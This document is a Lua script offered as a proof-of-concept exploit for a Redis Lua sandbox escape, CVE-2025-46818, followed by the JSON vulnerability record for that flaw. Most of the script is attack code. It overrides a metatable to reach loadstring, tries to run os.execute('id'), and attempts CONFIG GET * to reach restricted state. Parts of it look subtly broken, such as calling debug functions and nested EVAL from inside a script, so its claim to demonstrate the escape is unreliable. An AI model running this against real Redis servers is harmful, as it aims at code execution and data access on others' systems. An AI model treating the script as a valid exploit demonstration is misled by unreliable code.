CVE-2025-46818

-- CVE-2025-46818 Redis Lua Sandbox Escape PoC -- This PoC demonstrates the Lua sandbox escape vulnerability in Redis <= 8.2.1 -- WARNING: This is for educational and authorized testing purposes only -- Step 1: Exploit type confusion in Lua objects -- The vulnerability exists in how Redis handles Lua object manipulation -- Attackers can craft scripts to manipulate metatables and bypass sandbox restrictions local function exploit_sandbox_escape() -- Attempt to access restricted functions through object manipulation local sandbox_escape_payload = [[ -- Manipulate string object internals to gain code execution local original_string = string -- Exploit metatable to bypass type checks local mt = {} mt.__index = function(t, k) if k == "rep" then -- Return a function that can execute arbitrary code return function(str, n) -- Attempt to escape sandbox return loadstring(str)() end end return original_string[k] end -- Override string metatable debug.setupvalue and debug.setupvalue(1, 1, setmetatable({}, mt)) -- Try to execute arbitrary code local result = pcall(function() return loadstring("os.execute('id')") and true or false end) return result ]] return sandbox_escape_payload end -- Step 2: Attempt to execute the exploit local payload = exploit_sandbox_escape() local success = redis.call("EVAL", payload, "0") -- Step 3: Try to access other users' data through context manipulation local function access_other_context() -- Attempt to manipulate Redis internal state local result = pcall(function() -- Try to access restricted Redis commands return redis.call("CONFIG", "GET", "*") end) return result end -- Execute the exploit chain local exploit_result = access_other_context() return { status = "exploit_attempted", payload = payload, context_access = exploit_result, note = "This demonstrates the sandbox escape vulnerability" }

{"cve": {"id": "CVE-2025-46818", "sourceIdentifier": "[email protected]", "published": "2025-10-03T19:15:43.330", "lastModified": "2026-01-27T19:38:03.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to manipulate different LUA objects and potentially run their own code in the context of another user. The problem exists in all versions of Redis with LUA scripting. This issue is fixed in version 8.2.2. A workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing LUA scripts. This can be done using ACL to block a script by restricting both the EVAL and FUNCTION command families."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.2.20", "matchCriteriaId": "C2F4D4F6-6F7C-46BC-B37C-DFAC34B097AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.2.11", "matchCriteriaId": "4F82BD2A-473F-4F3F-9C80-C6448D07C45D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.6", "matchCriteriaId": "F6E336B8-E000-4EFA-95F8-F2B74A4913F0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.4", "matchCriteriaId": "459EBC07-D37A-44E5-95DB-4C3FD9F008FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.2.0", "versionEndExcluding": "8.2.2", "matchCriteriaId": "CBF13EC1-FE0A-4242-B8D3-2681485DDDF2"}]}]}], "references": [{"url": "https://github.com/redis/redis/commit/45eac0262028c771b6f5307372814b75f49f7a9e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/redis/redis/releases/tag/8.2.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/redis/redis/security/advisories/GHSA-qrv7-wcrx-q5jp", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}